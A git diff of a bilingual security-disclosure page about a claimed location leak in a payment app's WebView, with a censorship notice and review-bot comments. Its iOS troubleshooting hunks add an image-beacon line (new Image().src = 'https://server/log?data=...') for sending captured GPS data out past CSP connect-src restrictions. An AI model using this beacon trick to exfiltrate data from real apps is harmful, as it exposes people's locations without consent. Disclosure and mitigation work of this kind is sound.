diff --git a/index.html b/index.html index df3cc6a..135f589 100644 --- a/index.html +++ b/index.html @@ -515,81 +515,66 @@ body.lang-en .en { display: block; } - +
-
-
-

- 📢 官方声明 & 微信公众号文章 - 📢 Official Statement & WeChat Articles +
+
+ +

+ 🚨 审查通知:微信公众号文章已被全部强制删除 + 🚨 CENSORSHIP NOTICE: All WeChat Articles Forcibly Deleted

-
- - ⚠️ 重要声明:本研究的所有后续更新仅通过以下两个官方渠道发布
- 1️⃣ 本页面(https://innora.ai/zfb/
- 2️⃣ 微信公众号 AI-security-innora
- 其他任何渠道发布的内容均非本团队授权,请勿轻信。 +
+ + 2026-03-15 — 我们在微信公众号 AI-security-innora 发布的 4 篇安全研究文章全部被强制删除
+ 删除理由:"违反《中华人民共和国网络安全法》"(接相关投诉)。
+ 投诉方:北京格韵律师事务所(代理厂商蚂蚁集团)。

+ 这是厂商应对安全研究的第四层手段:
+ ① 口头否认(3/10 "正常功能")→ ② 律师函(3/11 发布4小时后)→ ③ 服务器端封堵 PoC(3/15 白名单拦截)→ ④ 平台审查删除所有文章(3/15)

+ 本页面 (innora.ai/zfb/) 部署在中国境外服务器,不受微信平台审查影响。研究内容完整保留。
- - ⚠️ Important: All future updates to this research are published exclusively through two official channels:
- 1️⃣ This page (https://innora.ai/zfb/)
- 2️⃣ WeChat Official Account: AI-security-innora
- Content from any other source is not authorized by our team. + + 2026-03-15 — All 4 security research articles published on our WeChat Official Account AI-security-innora have been forcibly deleted.
+ Reason given: "Violation of the Cybersecurity Law of the People's Republic of China" (following a complaint).
+ Complainant: Beijing Geyun Law Firm (representing Ant Group).

+ This represents the vendor's fourth layer of response to security research:
+ ① Verbal denial (3/10 "normal functionality") → ② Lawyer's letter (3/11, 4hrs after disclosure) → ③ Server-side PoC blocking (3/15, whitelist filtering) → ④ Platform censorship of all articles (3/15)

+ This page (innora.ai/zfb/) is hosted outside mainland China and is not subject to WeChat censorship. All research content is preserved here.
-
- -
- NEW - - 当白名单绕过沦为全网攻击的钥匙,傲慢的终点是法庭与溯源调查 - When Whitelist Bypass Becomes the Master Key — Arrogance Ends at the Courtroom - +
+

+ 被删除的 4 篇文章: + 4 Deleted Articles: +

+
+
+ DELETED + 当白名单绕过沦为全网攻击的钥匙,傲慢的终点是法庭与溯源调查When Whitelist Bypass Becomes the Master Key
-
- Vol.19 — 全球160个监管机构通报 + 白名单绕过完整技术分析 - Vol.19 — Global regulatory notification to 160 agencies + complete whitelist bypass analysis +
+ DELETED + 巨头的"封口令"被微信驳回,全球顶级黑客弹药库给出最终裁决Tech Giant's "Gag Order" Rejected by WeChat
-
- -
- HOT - - 巨头的"封口令"被微信驳回,全球顶级黑客弹药库给出最终裁决 - Tech Giant's "Gag Order" Rejected by WeChat, Packet Storm Delivers Final Verdict - +
+ DELETED + 位置被秒偷!10多亿人每天在用的国民支付应用,17个「正常功能」细思极恐!Location Stolen Instantly! 17 "Normal Features"
-
- Vol.15 — 微信投诉驳回 + Packet Storm Security 收录 (ID 217089) - Vol.15 — WeChat complaint dismissed + Packet Storm published (ID 217089) +
+ DELETED + 支付宝安全研究遭律师函投诉 — 一篇零次提及"支付宝"的文章如何构成"商誉侵权"?Alipay Research Hit with Lawyer's Letter
-
- -
- LEGAL - - 支付宝安全研究遭律师函投诉 — 一篇零次提及"支付宝"的文章如何构成"商誉侵权"? - Alipay Research Hit with Lawyer's Letter — How Does Zero Mentions Constitute "Reputation Infringement"? - -
-
- 完整法律申诉 — 逐条回应投诉方三项"不实信息"主张 - Full legal defense — point-by-point rebuttal of all three "false information" claims -
-
- -
- ORIGINAL - - 位置被秒偷!10多亿人每天在用的国民支付应用,17个「正常功能」细思极恐! - Location Stolen Instantly! 17 "Normal Features" in a Payment App Used by 1B+ People - -
-
- 原始技术分析 — 17个漏洞 + 308条日志 + 42张截图 + 3台设备跨3国验证 - Original analysis — 17 issues + 308 logs + 42 screenshots + 3 devices across 3 countries -
-
+
+
+
+
+ WeChat censorship notification 1 +

微信平台删除通知 (1/2)WeChat deletion notice (1/2)

+
+
+ WeChat censorship notification 2 +

微信平台删除通知 (2/2)WeChat deletion notice (2/2)

+
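Review bot: The replacement block loses the per-article metadata that made the list traceable: the removed `-` lines carried "Vol.19 — 全球160个监管机构通报 + 白名单绕过完整技术分析", "Vol.15 — 微信投诉驳回 + Packet Storm Security 收录 (ID 217089)", the "完整法律申诉" and "原始技术分析 — 17个漏洞 + 308条日志 + 42张截图" descriptions, and the new list shows only four bare DELETED titles. Suggest keeping at least the volume numbers and the Packet Storm ID under each DELETED entry so readers can still locate the archived copies now that the WeChat originals are gone. The removed "⚠️ 重要声明 / Important" paragraph that named the two official channels should also not vanish silently; with the WeChat account now unusable, a one-line replacement stating that this page (innora.ai/zfb/) is the sole authoritative channel preserves that guidance and matches the "不受微信平台审查影响" sentence already added.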
@@ -2392,10 +2377,12 @@ Language/zh-Hant Region/CN

freshnn 报告 iOS 可以调用并打开相关页面,但服务端收不到数据;Android 上「无感 GPS」则复现成功。

可能原因:

    -
  • 域名/HTTPS 配置 — iOS WKWebView 对混合内容和 CORS 策略更严格,PoC 服务器需使用有效 HTTPS 证书且设置正确的 CORS 头
  • +
  • HTTPS 混合内容阻止 — 如果 PoC 页面在 HTTPS 的支付宝 WebView 中加载,而数据外传目标是 HTTP,WKWebView 会直接阻止请求发出(注意:这会阻止 request 本身,不只是 response)
  • +
  • CSP connect-src 限制 — 支付宝 WebView 可能设置了 CSP 的 connect-src 指令,阻止向外部域发送请求
  • +
  • 解决方案 — 使用 Image beacon(new Image().src = "https://server/log?data=...")属于 simple request 且不受 connect-src 限制
  • 支付宝版本差异 — 不同版本的 JSBridge 鉴权策略可能不同,建议使用最新版测试
  • -
  • CSP(内容安全策略) — iOS 上可能有更严格的 CSP 头限制外部请求
+

技术修正:感谢 meooxx 指出 CORS 是浏览器端策略——它阻止的是浏览器读取 response,不阻止 request 到达服务器。对于 simple request,服务器一定会收到请求。

关键事实:我们的 iPhone 16 Pro (iOS 18.3) 测试确实成功获取了 GPS 数据(记录在服务器日志中),蚂蚁集团安全负责人的 iPhone 在杭州的测试也被我们成功获取了坐标。iOS 复现需要满足特定的服务器配置条件,并非漏洞不存在。

我们将在 Issue #5 中提供详细的 iOS 复现排查指南。

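Review bot: The new "解决方案 — 使用 Image beacon ... 属于 simple request 且不受 connect-src 限制" bullet mixes two unrelated mechanisms: "simple request" is CORS terminology, and the 技术修正 paragraph below this list already states CORS never blocks a request from being sent, so it has no bearing on whether CSP allows the load. The reason an <img> fetch is not subject to connect-src is that image loads are governed by the img-src directive (falling back to default-src), so the sentence should say that explicitly and note the condition under which it still fails: a WebView CSP that sets img-src or default-src blocks the beacon just as connect-src blocks fetch/XHR. Stated that way the bullet is also useful on the mitigation side, since img-src is the directive a vendor would set to close this channel. The English hunk below carries the same wording and should be corrected in step.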
@@ -2404,10 +2391,12 @@ Language/zh-Hant Region/CN

freshnn reported that iOS can invoke and open the relevant pages, but the server receives no data; Android "silent GPS" was successfully reproduced.

Possible causes:

    -
  • Domain/HTTPS configuration — iOS WKWebView enforces stricter mixed content and CORS policies; PoC server needs valid HTTPS certificate with correct CORS headers
  • +
  • HTTPS mixed content blocking — If the PoC page loads in Alipay's HTTPS WebView but the exfiltration target is HTTP, WKWebView will block the request entirely (this blocks the request itself, not just the response)
  • +
  • CSP connect-src restriction — Alipay's WebView may set CSP connect-src directives that block requests to external domains
  • +
  • Solution — Use Image beacon (new Image().src = "https://server/log?data=...") which is a simple request not restricted by connect-src
  • Alipay version differences — Different versions may have different JSBridge authentication policies; test with the latest version
  • -
  • CSP (Content Security Policy) — Stricter CSP headers on iOS may restrict external requests
+

Technical correction: Thanks to meooxx for pointing out that CORS is a browser-side policy — it blocks the browser from reading the response, not the request from reaching the server. For simple requests, the server always receives the request.

Key fact: Our iPhone 16 Pro (iOS 18.3) test did successfully obtain GPS data (recorded in server logs). Ant Group's security lead's iPhone in Hangzhou was also successfully captured. iOS reproduction requires specific server configuration — the vulnerability exists, but the PoC setup matters.

We will provide a detailed iOS reproduction troubleshooting guide in Issue #5.

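Review bot: The added "Solution — Use Image beacon ..." item is not a possible cause, yet it sits inside the "Possible causes:" list between the CSP connect-src cause and the Alipay version cause, which breaks the list's logic in both the English and the parallel Chinese hunk above; move it to its own short paragraph after the list (for example just before the "Technical correction" paragraph) so the list contains only causes. Two smaller points in the same region: the "Key fact" paragraph now says "the vulnerability exists, but the PoC setup matters", which is a looser rendering than the Chinese "并非漏洞不存在"; keep the two versions aligned. And "Issue #5" is referenced without a link or repository name, so readers of the rendered page cannot follow it; add the URL or the repo path where Issue #5 lives.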
diff --git a/wechat_censored_1.jpeg b/wechat_censored_1.jpeg new file mode 100644 index 0000000..582d18a Binary files /dev/null and b/wechat_censored_1.jpeg differ diff --git a/wechat_censored_2.jpeg b/wechat_censored_2.jpeg new file mode 100644 index 0000000..b9d84ca Binary files /dev/null and b/wechat_censored_2.jpeg differ